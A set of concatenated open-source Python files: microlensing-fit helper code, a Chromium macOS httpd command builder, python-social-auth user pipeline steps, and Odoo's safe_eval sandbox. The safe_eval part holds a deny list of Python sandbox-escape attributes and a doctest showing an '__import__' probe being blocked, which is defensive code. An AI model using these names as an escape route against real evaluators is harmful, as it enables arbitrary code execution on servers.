flux = microltoolbox.magnitude_to_flux(mag)
# clean the lightcurve using Savitzky-Golay filter on 3 points, degree 1.
mag_clean = ss.savgol_filter(mag, 3, 1)
time = lightcurve_bis[:, 0]
flux_clean = microltoolbox.flux_to_magnitude(mag_clean)
errmag = lightcurve_bis[:, 2]
flux_source = min(flux_clean)
good_points = np.where(flux_clean > flux_source)[0]
while (np.std(time[good_points]) > 5) | (len(good_points) > 100):
indexes = \
np.where((flux_clean[good_points] > np.median(flux_clean[good_points])) & (
errmag[good_points] <= max(0.1, 2.0 * np.mean(errmag[good_points]))))[0]
if len(indexes) < 1:
break
else:
good_points = good_points[indexes]
# gravity = (
# np.median(time[good_points]), np.median(flux_clean[good_points]),
# np.mean(errmag[good_points]))
# distances = np.sqrt((time[good_points] - gravity[0]) ** 2 / gravity[0] ** 2)
to = np.median(time[good_points])
max_flux = max(flux[good_points])
to_estimations.append(to)
maximum_flux_estimations.append(max_flux)
errors_magnitude.append(np.mean(lightcurve_bis[good_points, 2]))
except:
time = lightcurve_magnitude[:, 0]
flux = microltoolbox.magnitude_to_flux(lightcurve_magnitude[:, 1])
to = np.median(time)
max_flux = max(flux)
to_estimations.append(to)
maximum_flux_estimations.append(max_flux)
errors_magnitude.append(mean_error_magnitude)
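# Combine the per-telescope t_o estimates below as an inverse-variance weighted
# mean, using each telescope's mean photometric error as sigma.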
to_guess = sum(np.array(to_estimations) / np.array(errors_magnitude) ** 2) / sum(
1 / np.array(errors_magnitude) ** 2)
survey = event.telescopes[0]
lightcurve = survey.lightcurve_magnitude
lightcurve = lightcurve[lightcurve[:, 0].argsort(), :]
## fs, uo, tE estimations only on the survey telescope
time = lightcurve[:, 0]
flux = microltoolbox.magnitude_to_flux(lightcurve[:, 1])
errflux = microltoolbox.error_magnitude_to_error_flux(lightcurve[:, 2], flux)
# fs estimation, no blend
baseline_flux_0 = np.min(flux)
baseline_flux = np.median(flux)
while np.abs(baseline_flux_0 - baseline_flux) > 0.01 * baseline_flux:
baseline_flux_0 = baseline_flux
indexes = np.where((flux < baseline_flux))[0].tolist() + np.where(
np.abs(flux - baseline_flux) < np.abs(errflux))[0].tolist()
baseline_flux = np.median(flux[indexes])
if len(indexes) < 100:
baseline_flux = np.median(flux[flux.argsort()[:100]])
break
fs_guess = baseline_flux
# uo estimation
max_flux = maximum_flux_estimations[0]
Amax = max_flux / fs_guess
if (Amax < 1.0) | np.isnan(Amax):
Amax = 1.1
uo_guess = np.sqrt(-2 + 2 * np.sqrt(1 - 1 / (1 - Amax ** 2)))
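# The expression above inverts the standard PSPL peak magnification
# A(u) = (u**2 + 2) / (u * sqrt(u**2 + 4)) for u, i.e.
# u**2 = -2 + 2*sqrt(1 + 1/(A**2 - 1)); note that
# 1 - 1/(1 - Amax**2) == 1 + 1/(Amax**2 - 1).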
# tE estimations
tE_guesses = []
# Method 1 : flux(t_demi_amplification) = 0.5 * fs_guess * (Amax + 1)
half_magnification = 0.5 * (Amax + 1)
flux_demi_amplification = fs_guess * half_magnification
index_plus = np.where((time > to_guess) & (flux < flux_demi_amplification))[0]
index_moins = np.where((time < to_guess) & (flux < flux_demi_amplification))[0]
if len(index_plus) != 0:
if len(index_moins) != 0:
t_demi_amplification = (time[index_plus[0]] - time[index_moins[-1]])
tE_demi_amplification = t_demi_amplification / (
2 * np.sqrt(-2 + 2 * np.sqrt(1 + 1 / (half_magnification ** 2 - 1)) - uo_guess ** 2))
tE_guesses.append(tE_demi_amplification)
else:
t_demi_amplification = time[index_plus[0]] - to_guess
tE_demi_amplification = t_demi_amplification / np.sqrt(
-2 + 2 * np.sqrt(1 + 1 / (half_magnification ** 2 - 1)) - uo_guess ** 2)
tE_guesses.append(tE_demi_amplification)
else:
if len(index_moins) != 0:
t_demi_amplification = to_guess - time[index_moins[-1]]
tE_demi_amplification = t_demi_amplification / np.sqrt(
-2 + 2 * np.sqrt(1 + 1 / (half_magnification ** 2 - 1)) - uo_guess ** 2)
tE_guesses.append(tE_demi_amplification)
# Method 2 : flux(t_E) = fs_guess * (uo^2+3)/[(uo^2+1)^0.5*(uo^2+5)^0.5]
amplification_tE = (uo_guess ** 2 + 3) / ((uo_guess ** 2 + 1) ** 0.5 * np.sqrt(uo_guess ** 2 + 5))
flux_tE = fs_guess * amplification_tE
index_tE_plus = np.where((flux < flux_tE) & (time > to))[0]
index_tE_moins = np.where((flux < flux_tE) & (time < to))[0]
if len(index_tE_moins) != 0:
index_tE_moins = index_tE_moins[-1]
tE_moins = to_guess - time[index_tE_moins]
tE_guesses.append(tE_moins)
if len(index_tE_plus) != 0:
index_tE_plus = index_tE_plus[0]
tE_plus = time[index_tE_plus] - to_guess
tE_guesses.append(tE_plus)
# Method 3 : the first points before/after to_guess that reach the baseline. Very rough
# approximation of tE.
index_tE_baseline_plus = np.where((time > to) & (np.abs(flux - fs_guess) < np.abs(errflux)))[0]
index_tE_baseline_moins = np.where((time < to) & (np.abs(flux - fs_guess) < np.abs(errflux)))[0]
if len(index_tE_baseline_plus) != 0:
tEPlus = time[index_tE_baseline_plus[0]] - to_guess
tE_guesses.append(tEPlus)
if len(index_tE_baseline_moins) != 0:
tEMoins = to_guess - time[index_tE_baseline_moins[-1]]
tE_guesses.append(tEMoins)
tE_guess = np.median(tE_guesses)
# safety reason, unlikely
if (tE_guess < 0.1) | np.isnan(tE_guess):
tE_guess = 20.0
# [to,uo,tE], fsource
return [to_guess, uo_guess, tE_guess], fs_guess
def initial_guess_FSPL(event):
"""Function to find initial FSPL guess for Levenberg-Marquardt solver (method=='LM').
This assumes no blending.
:param object event: the event object on which you perform the fit. More details in the
event module.
:return: the FSPL guess for this event. A list of parameters associated to the FSPL model + the source flux of
the survey telescope.
:rtype: list,float
"""
PSPL_guess, fs_guess = initial_guess_PSPL(event)
# Dummy guess
rho_guess = 0.05
FSPL_guess = PSPL_guess + [rho_guess]
# [to,uo,tE,rho], fsource
return FSPL_guess, fs_guess
def initial_guess_DSPL(event):
"""Function to find initial DSPL guess for Levenberg-Marquardt solver (method=='LM').
This assumes no blending.
:param object event: the event object on which you perform the fit. More details in the
event module.
:return: the DSPL guess for this event. A list of parameters associated to the DSPL model + the source flux of
the survey telescope.
:rtype: list,float
"""
PSPL_guess, fs_guess = initial_guess_PSPL(event)
filters = [telescope.filter for telescope in event.telescopes]
unique_filters = np.unique(filters)
# Dummy guess
delta_to_guess = 5 # days
delta_uo_guess = 0.01
q_flux_guess = 0.5
DSPL_guess = PSPL_guess[:2] + [delta_to_guess] + [delta_uo_guess] + \
[PSPL_guess[2]] + [q_flux_guess] * len(unique_filters)
# [to1,uo1,delta_to,uo2,tE,q_F_i], fsource
return DSPL_guess, fs_guess
def differential_evolution_parameters_boundaries(model):
""" This function define the parameters boundaries for a specific model.
:param object model: a microlmodels object.
:return: parameters_boundaries, a list of tuple containing parameters limits
:rtype: list
"""
minimum_observing_time_telescopes = [min(telescope.lightcurve_flux[:, 0]) - 0 for telescope in
model.event.telescopes]
maximum_observing_time_telescopes = [max(telescope.lightcurve_flux[:, 0]) + 0 for telescope in
model.event.telescopes]
to_boundaries = (min(minimum_observing_time_telescopes), max(maximum_observing_time_telescopes))
delta_to_boundaries = (-150, 150)
delta_uo_boundaries = (-1.0, 1.0)
uo_boundaries = (0.0, 1.0)
tE_boundaries = (0.1, 500)
rho_boundaries = (5 * 10 ** -5, 0.05)
q_flux_boundaries = (0.001, 1.0)
logs_boundaries = (-1.0, 1.0)
logq_boundaries = (-6.0, 0.0)
alpha_boundaries = (-np.pi, np.pi)
piEN_boundaries = (-2.0, 2.0)
piEE_boundaries = (-2.0, 2.0)
XiEN_boundaries = (-2.0, 2.0)
XiEE_boundaries = (-2.0, 2.0)
dsdt_boundaries = (-10,10)
dalphadt_boundaries = (-10,10)
v_boundaries = (-2,2)
mass_boundaries = [10**-1,10]
rE_boundaries = [10**-1,100]
v_boundaries = (-2,2)
ra_xal_boundaries = [0,360]
dec_xal_boundaries = [-90,90]
period_xal_boundaries = [0.001,1000]
ecc_xal_boundaries = [0,1]
t_peri_xal_boundaries = to_boundaries
# model_xallarap_boundaries = {'None': [], 'True': [(-2.0, 2.0), (-2.0, 2.0)]}
# model_orbital_motion_boundaries = {'None': [], '2D': [], '3D': []}
# model_source_spots_boundaries = {'None': []}
period_variable = (0.001,1000)
phase_variable = (-np.pi, np.pi)
amplitude_variable = (0.0, 3.0)
octave_variable = (10**-10,1)
q_boundaries = (-2, 2)
# Paczynski models boundaries
if model.model_type == 'PSPL':
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries]
if model.model_type == 'FSPL':
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries, rho_boundaries]
if model.model_type == 'DSPL':
parameters_boundaries = [to_boundaries, uo_boundaries, delta_to_boundaries,
delta_uo_boundaries, tE_boundaries]
filters = [telescope.filter for telescope in model.event.telescopes]
unique_filters = np.unique(filters)
parameters_boundaries += [q_flux_boundaries] * len(unique_filters)
if model.model_type == 'DFSPL':
parameters_boundaries = [to_boundaries, uo_boundaries, delta_to_boundaries,
delta_uo_boundaries, tE_boundaries,rho_boundaries,rho_boundaries]
filters = [telescope.filter for telescope in model.event.telescopes]
unique_filters = np.unique(filters)
parameters_boundaries += [q_flux_boundaries] * len(unique_filters)
if model.model_type == 'PSBL':
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries, logs_boundaries,
logq_boundaries, alpha_boundaries]
if (model.model_type == 'USBL') or (model.model_type == 'FSBL'):
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries, rho_boundaries, logs_boundaries,
logq_boundaries, alpha_boundaries]
#fluxes = [(0,np.max(telescope.lightcurve_flux[:,1])) for telescope in model.event.telescopes]
#blend = [(0,100) for telescope in model.event.telescopes]
#for ind,telo in enumerate(model.event.telescopes):
#parameters_boundaries+=[fluxes[ind], blend[ind]]
if model.model_type == 'VariablePL':
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries,rho_boundaries, period_variable]
filters = [telescope.filter for telescope in model.event.telescopes]
unique_filters = np.unique(filters)
for i in range(model.number_of_harmonics):
for j in unique_filters:
parameters_boundaries += [amplitude_variable]
parameters_boundaries += [phase_variable]
parameters_boundaries += [octave_variable]
# Second order boundaries
if model.parallax_model[0] != 'None':
parameters_boundaries.append(piEN_boundaries)
parameters_boundaries.append(piEE_boundaries)
if model.xallarap_model[0] != 'None':
parameters_boundaries.append(XiEN_boundaries)
parameters_boundaries.append(XiEE_boundaries)
parameters_boundaries.append(ra_xal_boundaries)
parameters_boundaries.append(dec_xal_boundaries)
parameters_boundaries.append(period_xal_boundaries)
if model.xallarap_model[0] != 'Circular':
parameters_boundaries.append(ecc_xal_boundaries)
parameters_boundaries.append(t_peri_xal_boundaries)
if model.orbital_motion_model[0] == '2D':
parameters_boundaries.append(dsdt_boundaries)
parameters_boundaries.append(dalphadt_boundaries)
if model.orbital_motion_model[0] == 'Circular':
parameters_boundaries.append(dsdt_boundaries)
parameters_boundaries.append(dsdt_boundaries)
parameters_boundaries.append(dsdt_boundaries)
if model.orbital_motion_model[0] == 'Keplerian':
parameters_boundaries.append(logs_boundaries)
parameters_boundaries.append(v_boundaries)
parameters_boundaries.append(v_boundaries)
parameters_boundaries.append(v_boundaries)
parameters_boundaries.append(mass_boundaries)
parameters_boundaries.append(rE_boundaries)
# if source_spots
return parameters_boundaries
def MCMC_parameters_initialization(parameter_key, parameters_dictionnary, parameters):
"""Generate a random parameter for the MCMC initialization.
:param str parameter_key: the parameter on which we apply the function
:param dict parameters_dictionnary: the dictionary of parameter keys associated to the parameters input
:param list parameters: a list of floats giving the model parameters
:return: a list containing the trial(s) associated to the parameter_key string
:rtype: list of float
"""
#if ('to' in parameter_key) :
# epsilon = np.random.uniform(-0.01, 0.01)
# to_parameters_trial = parameters[parameters_dictionnary[parameter_key]] + epsilon
# return [to_parameters_trial]
# if 'fs' in parameter_key:
# epsilon = np.random.uniform(0,0.0001)
# fs_trial = parameters[parameters_dictionnary[parameter_key]] +epsilon
#g_trial = (1 + parameters[parameters_dictionnary[parameter_key] + 1]) / epsilon - 1
# epsilon = np.random.uniform(0,0.0001)
# g_trial = parameters[parameters_dictionnary[parameter_key] + 1] +epsilon
# return [fs_trial, g_trial]
# return
#if ('g_' in parameter_key) or ('fb_' in parameter_key):
# return
# if 'pi' in parameter_key:
# epsilon = np.random.uniform(0.9, 1.1)
# sign = np.random.choice([-1,1])
# pi_trial = sign*parameters[parameters_dictionnary[parameter_key]] * epsilon
# return [pi_trial]
#if 'rho' in parameter_key:
# epsilon = np.random.uniform(0.99, 1.01)
# rho_parameters_trial = parameters[parameters_dictionnary[parameter_key]] * epsilon
# return [rho_parameters_trial]
#if 'logs' in parameter_key:
# epsilon = np.random.uniform(-0.05, 0.05)
# logs_parameters_trial = parameters[parameters_dictionnary[parameter_key]] + epsilon
# return [logs_parameters_trial]
#if 'logq' in parameter_key:
# epsilon = np.random.uniform(-0.05, 0.05)
# logq_parameters_trial = parameters[parameters_dictionnary[parameter_key]] + epsilon
# return [logq_parameters_trial]
epsilon = np.random.uniform(-1, 1)*10**-6
all_other_parameter_trial = parameters[parameters_dictionnary[parameter_key]] + epsilon
return [all_other_parameter_trial]
|
boundarydevices/android_external_chromium_org
|
refs/heads/cm-12.0
|
tools/python/google/platform_utils_mac.py
|
183
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Platform-specific utility methods shared by several scripts."""
import os
import subprocess
import google.path_utils
class PlatformUtility(object):
def __init__(self, base_dir):
"""Args:
base_dir: the base dir for running tests.
"""
self._base_dir = base_dir
self._httpd_cmd_string = None # used for starting/stopping httpd
self._bash = "/bin/bash"
def _UnixRoot(self):
"""Returns the path to root."""
return "/"
def GetFilesystemRoot(self):
"""Returns the root directory of the file system."""
return self._UnixRoot()
def GetTempDirectory(self):
"""Returns the file system temp directory
Note that this does not use a random subdirectory, so it's not
intrinsically secure. If you need a secure subdir, use the tempfile
package.
"""
return os.getenv("TMPDIR", "/tmp")
def FilenameToUri(self, path, use_http=False, use_ssl=False, port=8000):
"""Convert a filesystem path to a URI.
Args:
path: For an http URI, the path relative to the httpd server's
DocumentRoot; for a file URI, the full path to the file.
use_http: if True, returns a URI of the form http://127.0.0.1:8000/.
If False, returns a file:/// URI.
use_ssl: if True, returns HTTPS URL (https://127.0.0.1:8000/).
This parameter is ignored if use_http=False.
port: The port number to append when returning an HTTP URI
"""
if use_http:
protocol = 'http'
if use_ssl:
protocol = 'https'
return "%s://127.0.0.1:%d/%s" % (protocol, port, path)
return "file://" + path
def GetStartHttpdCommand(self, output_dir,
httpd_conf_path, mime_types_path,
document_root=None, apache2=False):
"""Prepares the config file and output directory to start an httpd server.
Returns a list of strings containing the server's command line+args.
Args:
output_dir: the path to the server's output directory, for log files.
It will be created if necessary.
httpd_conf_path: full path to the httpd.conf file to be used.
mime_types_path: full path to the mime.types file to be used.
document_root: full path to the DocumentRoot. If None, the DocumentRoot
from the httpd.conf file will be used. Note that the httpd.conf
file alongside this script does not specify any DocumentRoot, so if
you're using that one, be sure to specify a document_root here.
apache2: boolean if true will cause this function to return start
command for Apache 2.x as opposed to Apache 1.3.x. This flag
is ignored on Mac (but preserved here for compatibility in
function signature with win), where httpd2 is used always
"""
exe_name = "httpd"
cert_file = google.path_utils.FindUpward(self._base_dir, 'tools',
'python', 'google',
'httpd_config', 'httpd2.pem')
ssl_enabled = os.path.exists('/etc/apache2/mods-enabled/ssl.conf')
httpd_vars = {
"httpd_executable_path":
os.path.join(self._UnixRoot(), "usr", "sbin", exe_name),
"httpd_conf_path": httpd_conf_path,
"ssl_certificate_file": cert_file,
"document_root" : document_root,
"server_root": os.path.join(self._UnixRoot(), "usr"),
"mime_types_path": mime_types_path,
"output_dir": output_dir,
"ssl_mutex": "file:"+os.path.join(output_dir, "ssl_mutex"),
"user": os.environ.get("USER", "#%d" % os.geteuid()),
"lock_file": os.path.join(output_dir, "accept.lock"),
}
google.path_utils.MaybeMakeDirectory(output_dir)
# We have to wrap the command in bash
# -C: process directive before reading config files
# -c: process directive after reading config files
# Apache wouldn't run CGIs with permissions==700 unless we add
# -c User "<username>"
httpd_cmd_string = (
'%(httpd_executable_path)s'
' -f %(httpd_conf_path)s'
' -c \'TypesConfig "%(mime_types_path)s"\''
' -c \'CustomLog "%(output_dir)s/access_log.txt" common\''
' -c \'ErrorLog "%(output_dir)s/error_log.txt"\''
' -c \'PidFile "%(output_dir)s/httpd.pid"\''
' -C \'User "%(user)s"\''
' -C \'ServerRoot "%(server_root)s"\''
' -c \'LockFile "%(lock_file)s"\''
)
if document_root:
httpd_cmd_string += ' -C \'DocumentRoot "%(document_root)s"\''
if ssl_enabled:
httpd_cmd_string += (
' -c \'SSLCertificateFile "%(ssl_certificate_file)s"\''
' -c \'SSLMutex "%(ssl_mutex)s"\''
)
# Save a copy of httpd_cmd_string to use for stopping httpd
self._httpd_cmd_string = httpd_cmd_string % httpd_vars
httpd_cmd = [self._bash, "-c", self._httpd_cmd_string]
return httpd_cmd
def GetStopHttpdCommand(self):
"""Returns a list of strings that contains the command line+args needed to
stop the http server used in the http tests.
This tries to fetch the pid of httpd (if available) and returns the
command to kill it. If pid is not available, kill all httpd processes
"""
if not self._httpd_cmd_string:
return ["true"] # Haven't been asked for the start cmd yet. Just pass.
# Add a sleep after the shutdown because sometimes it takes some time for
# the port to be available again.
return [self._bash, "-c", self._httpd_cmd_string + ' -k stop && sleep 5']
|
tutumcloud/python-social-auth
|
refs/heads/master
|
social/pipeline/user.py
|
8
|
from uuid import uuid4
from social.utils import slugify, module_member
USER_FIELDS = ['username', 'email']
def get_username(strategy, details, user=None, *args, **kwargs):
if 'username' not in strategy.setting('USER_FIELDS', USER_FIELDS):
return
storage = strategy.storage
if not user:
email_as_username = strategy.setting('USERNAME_IS_FULL_EMAIL', False)
uuid_length = strategy.setting('UUID_LENGTH', 16)
max_length = storage.user.username_max_length()
do_slugify = strategy.setting('SLUGIFY_USERNAMES', False)
do_clean = strategy.setting('CLEAN_USERNAMES', True)
if do_clean:
clean_func = storage.user.clean_username
else:
clean_func = lambda val: val
if do_slugify:
override_slug = strategy.setting('SLUGIFY_FUNCTION')
if override_slug:
slug_func = module_member(override_slug)
else:
slug_func = slugify
else:
slug_func = lambda val: val
if email_as_username and details.get('email'):
username = details['email']
elif details.get('username'):
username = details['username']
else:
username = uuid4().hex
short_username = username[:max_length - uuid_length]
final_username = slug_func(clean_func(username[:max_length]))
# Generate a unique username for current user using username
# as base but adding a unique hash at the end. Original
# username is cut to avoid any field max_length.
while storage.user.user_exists(username=final_username):
username = short_username + uuid4().hex[:uuid_length]
final_username = slug_func(clean_func(username[:max_length]))
else:
final_username = storage.user.get_username(user)
return {'username': final_username}
def create_user(strategy, details, user=None, *args, **kwargs):
if user:
return {'is_new': False}
fields = dict((name, kwargs.get(name) or details.get(name))
for name in strategy.setting('USER_FIELDS',
USER_FIELDS))
if not fields:
return
return {
'is_new': True,
'user': strategy.create_user(**fields)
}
def user_details(strategy, details, user=None, *args, **kwargs):
"""Update user details using data from provider."""
if user:
changed = False # flag to track changes
protected = strategy.setting('PROTECTED_USER_FIELDS', [])
keep = ('username', 'id', 'pk') + tuple(protected)
for name, value in details.items():
# do not update username, it was already generated
# do not update configured fields if user already existed
if name not in keep and hasattr(user, name):
if value and value != getattr(user, name, None):
try:
setattr(user, name, value)
changed = True
except AttributeError:
pass
if changed:
strategy.storage.user.changed(user)
|
jk1/intellij-community
|
refs/heads/master
|
python/testData/intentions/replaceBackQuoteExpression_after.py
|
83
|
repr(a + b, 34 + a)
|
fhe-odoo/odoo
|
refs/heads/8.0
|
openerp/tools/safe_eval.py
|
25
|
# -*- coding: utf-8 -*-
##############################################################################
# Copyright (C) 2004-2014 OpenERP s.a. (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
"""
safe_eval module - methods intended to provide more restricted alternatives to
evaluate simple and/or untrusted code.
Methods in this module are typically used as alternatives to eval() to parse
OpenERP domain strings, conditions and expressions, mostly based on locals
condition/math builtins.
"""
# Module partially ripped from/inspired by several different sources:
# - http://code.activestate.com/recipes/286134/
# - safe_eval in lp:~xrg/openobject-server/optimize-5.0
# - safe_eval in tryton http://hg.tryton.org/hgwebdir.cgi/trytond/rev/bbb5f73319ad
from opcode import HAVE_ARGUMENT, opmap, opname
from types import CodeType
import logging
from .misc import ustr
import openerp
__all__ = ['test_expr', 'safe_eval', 'const_eval']
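# Usage sketch (safe_eval and const_eval are exported above and defined later in
# this module; the expressions and values here are hypothetical):
#   const_eval("[1, 2, (3, 4)]")                        # -> [1, 2, (3, 4)]
#   safe_eval("foo + 2 * bar", {'foo': 1, 'bar': 3})    # -> 7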
# The time module is usually already provided in the safe_eval environment
# but some code, e.g. datetime.datetime.now() (Windows/Python 2.5.2, bug
# lp:703841), does import time.
_ALLOWED_MODULES = ['_strptime', 'math', 'time']
_UNSAFE_ATTRIBUTES = ['f_builtins', 'f_globals', 'f_locals', 'gi_frame',
'co_code', 'func_globals']
_CONST_OPCODES = set(opmap[x] for x in [
'POP_TOP', 'ROT_TWO', 'ROT_THREE', 'ROT_FOUR', 'DUP_TOP', 'DUP_TOPX',
'POP_BLOCK','SETUP_LOOP', 'BUILD_LIST', 'BUILD_MAP', 'BUILD_TUPLE',
'LOAD_CONST', 'RETURN_VALUE', 'STORE_SUBSCR', 'STORE_MAP'] if x in opmap)
_EXPR_OPCODES = _CONST_OPCODES.union(set(opmap[x] for x in [
'UNARY_POSITIVE', 'UNARY_NEGATIVE', 'UNARY_NOT',
'UNARY_INVERT', 'BINARY_POWER', 'BINARY_MULTIPLY',
'BINARY_DIVIDE', 'BINARY_FLOOR_DIVIDE', 'BINARY_TRUE_DIVIDE',
'BINARY_MODULO', 'BINARY_ADD', 'BINARY_SUBTRACT', 'BINARY_SUBSCR',
'BINARY_LSHIFT', 'BINARY_RSHIFT', 'BINARY_AND', 'BINARY_XOR',
'BINARY_OR', 'INPLACE_ADD', 'INPLACE_SUBTRACT', 'INPLACE_MULTIPLY',
'INPLACE_DIVIDE', 'INPLACE_REMAINDER', 'INPLACE_POWER',
'INPLACE_LEFTSHIFT', 'INPLACE_RIGHTSHIFT', 'INPLACE_AND',
'INPLACE_XOR','INPLACE_OR'
] if x in opmap))
_SAFE_OPCODES = _EXPR_OPCODES.union(set(opmap[x] for x in [
'LOAD_NAME', 'CALL_FUNCTION', 'COMPARE_OP', 'LOAD_ATTR',
'STORE_NAME', 'GET_ITER', 'FOR_ITER', 'LIST_APPEND', 'DELETE_NAME',
'JUMP_FORWARD', 'JUMP_IF_TRUE', 'JUMP_IF_FALSE', 'JUMP_ABSOLUTE',
'MAKE_FUNCTION', 'SLICE+0', 'SLICE+1', 'SLICE+2', 'SLICE+3', 'BREAK_LOOP',
'CONTINUE_LOOP', 'RAISE_VARARGS', 'YIELD_VALUE',
# New in Python 2.7 - http://bugs.python.org/issue4715 :
'JUMP_IF_FALSE_OR_POP', 'JUMP_IF_TRUE_OR_POP', 'POP_JUMP_IF_FALSE',
'POP_JUMP_IF_TRUE', 'SETUP_EXCEPT', 'END_FINALLY',
'LOAD_FAST', 'STORE_FAST', 'DELETE_FAST', 'UNPACK_SEQUENCE',
'LOAD_GLOBAL', # Only allows access to restricted globals
] if x in opmap))
_logger = logging.getLogger(__name__)
def _get_opcodes(codeobj):
"""_get_opcodes(codeobj) -> [opcodes]
Extract the actual opcodes as a list from a code object
>>> c = compile("[1 + 2, (1,2)]", "", "eval")
>>> _get_opcodes(c)
[100, 100, 23, 100, 100, 102, 103, 83]
"""
i = 0
byte_codes = codeobj.co_code
while i < len(byte_codes):
code = ord(byte_codes[i])
yield code
if code >= HAVE_ARGUMENT:
i += 3
else:
i += 1
def assert_no_dunder_name(code_obj, expr):
""" assert_no_dunder_name(code_obj, expr) -> None
Asserts that the code object does not refer to any "dunder name"
(__$name__), so that safe_eval prevents access to any internal-ish Python
attribute or method (both are loaded via LOAD_ATTR which uses a name, not a
const or a var).
Checks that no such name exists in the provided code object (co_names).
:param code_obj: code object to name-validate
:type code_obj: CodeType
:param str expr: expression corresponding to the code object, for debugging
purposes
:raises NameError: in case a forbidden name (containing two underscores)
is found in ``code_obj``
.. note:: actually forbids every name containing 2 underscores
"""
for name in code_obj.co_names:
if "__" in name or name in _UNSAFE_ATTRIBUTES:
raise NameError('Access to forbidden name %r (%r)' % (name, expr))
def assert_valid_codeobj(allowed_codes, code_obj, expr):
""" Asserts that the provided code object validates against the bytecode
and name constraints.
Recursively validates the code objects stored in its co_consts in case
lambdas are being created/used (lambdas generate their own separated code
objects and don't live in the root one)
:param allowed_codes: list of permissible bytecode instructions
:type allowed_codes: set(int)
:param code_obj: code object to name-validate
:type code_obj: CodeType
:param str expr: expression corresponding to the code object, for debugging
purposes
:raises ValueError: in case of forbidden bytecode in ``code_obj``
:raises NameError: in case a forbidden name (containing two underscores)
is found in ``code_obj``
"""
assert_no_dunder_name(code_obj, expr)
for opcode in _get_opcodes(code_obj):
if opcode not in allowed_codes:
raise ValueError(
"opcode %s not allowed (%r)" % (opname[opcode], expr))
for const in code_obj.co_consts:
if isinstance(const, CodeType):
assert_valid_codeobj(allowed_codes, const, 'lambda')
def test_expr(expr, allowed_codes, mode="eval"):
"""test_expr(expression, allowed_codes[, mode]) -> code_object
Test that the expression contains only the allowed opcodes.
If the expression is valid and contains only allowed codes,
return the compiled code object.
Otherwise raise a ValueError, SyntaxError or TypeError accordingly.
"""
try:
if mode == 'eval':
# eval() does not like leading/trailing whitespace
expr = expr.strip()
code_obj = compile(expr, "", mode)
except (SyntaxError, TypeError, ValueError):
raise
except Exception, e:
import sys
exc_info = sys.exc_info()
raise ValueError, '"%s" while compiling\n%r' % (ustr(e), expr), exc_info[2]
assert_valid_codeobj(allowed_codes, code_obj, expr)
return code_obj
def const_eval(expr):
"""const_eval(expression) -> value
Safe Python constant evaluation
Evaluates a string that contains an expression describing
a Python constant. Strings that are not valid Python expressions
or that contain other code besides the constant raise ValueError.
>>> const_eval("10")
10
>>> const_eval("[1,2, (3,4), {'foo':'bar'}]")
[1, 2, (3, 4), {'foo': 'bar'}]
>>> const_eval("1+2")
Traceback (most recent call last):
...
ValueError: opcode BINARY_ADD not allowed
"""
c = test_expr(expr, _CONST_OPCODES)
return eval(c)
def expr_eval(expr):
"""expr_eval(expression) -> value
Restricted Python expression evaluation
Evaluates a string that contains an expression that only
uses Python constants. This can be used to e.g. evaluate
a numerical expression from an untrusted source.
>>> expr_eval("1+2")
3
>>> expr_eval("[1,2]*2")
[1, 2, 1, 2]
>>> expr_eval("__import__('sys').modules")
Traceback (most recent call last):
...
ValueError: opcode LOAD_NAME not allowed
"""
c = test_expr(expr, _EXPR_OPCODES)
return eval(c)
def _import(name, globals=None, locals=None, fromlist=None, level=-1):
if globals is None:
globals = {}
if locals is None:
locals = {}
if fromlist is None:
fromlist = []
if name in _ALLOWED_MODULES:
return __import__(name, globals, locals, level)
raise ImportError(name)
def safe_eval(expr, globals_dict=None, locals_dict=None, mode="eval", nocopy=False, locals_builtins=False):
"""safe_eval(expression[, globals[, locals[, mode[, nocopy]]]]) -> result
System-restricted Python expression evaluation
Evaluates a string that contains an expression that mostly
uses Python constants, arithmetic expressions and the
objects directly provided in context.
This can be used to e.g. evaluate
an OpenERP domain expression from an untrusted source.
:throws TypeError: If the expression provided is a code object
:throws SyntaxError: If the expression provided is not valid Python
:throws NameError: If the expression provided accesses forbidden names
:throws ValueError: If the expression provided uses forbidden bytecode
"""
if isinstance(expr, CodeType):
raise TypeError("safe_eval does not allow direct evaluation of code objects.")
if globals_dict is None:
globals_dict = {}
# prevent altering the globals/locals from within the sandbox
# by taking a copy.
if not nocopy:
# isinstance() does not work below, we want *exactly* the dict class
if (globals_dict is not None and type(globals_dict) is not dict) \
or (locals_dict is not None and type(locals_dict) is not dict):
_logger.warning(
"Looks like you are trying to pass a dynamic environment, "
"you should probably pass nocopy=True to safe_eval().")
globals_dict = dict(globals_dict)
if locals_dict is not None:
locals_dict = dict(locals_dict)
globals_dict.update(
__builtins__={
'__import__': _import,
'True': True,
'False': False,
'None': None,
'str': str,
'unicode': unicode,
'bool': bool,
'int': int,
'float': float,
'long': long,
'enumerate': enumerate,
'dict': dict,
'list': list,
'tuple': tuple,
'map': map,
'abs': abs,
'min': min,
'max': max,
'sum': sum,
'reduce': reduce,
'filter': filter,
'round': round,
'len': len,
'repr': repr,
'set': set,
'all': all,
'any': any,
'ord': ord,
'chr': chr,
'cmp': cmp,
'divmod': divmod,
'isinstance': isinstance,
'range': range,
'xrange': xrange,
'zip': zip,
'Exception': Exception,
}
)
if locals_builtins:
if locals_dict is None:
locals_dict = {}
locals_dict.update(globals_dict.get('__builtins__'))
c = test_expr(expr, _SAFE_OPCODES, mode=mode)
try:
return eval(c, globals_dict, locals_dict)
except openerp.osv.orm.except_orm:
raise
except openerp.exceptions.Warning:
raise
except openerp.exceptions.RedirectWarning:
raise
except openerp.exceptions.AccessDenied:
raise
except openerp.exceptions.AccessError:
raise
except Exception, e:
import sys
exc_info = sys.exc_info()
raise ValueError, '"%s" while evaluating\n%r' % (ustr(e), expr), exc_info[2]
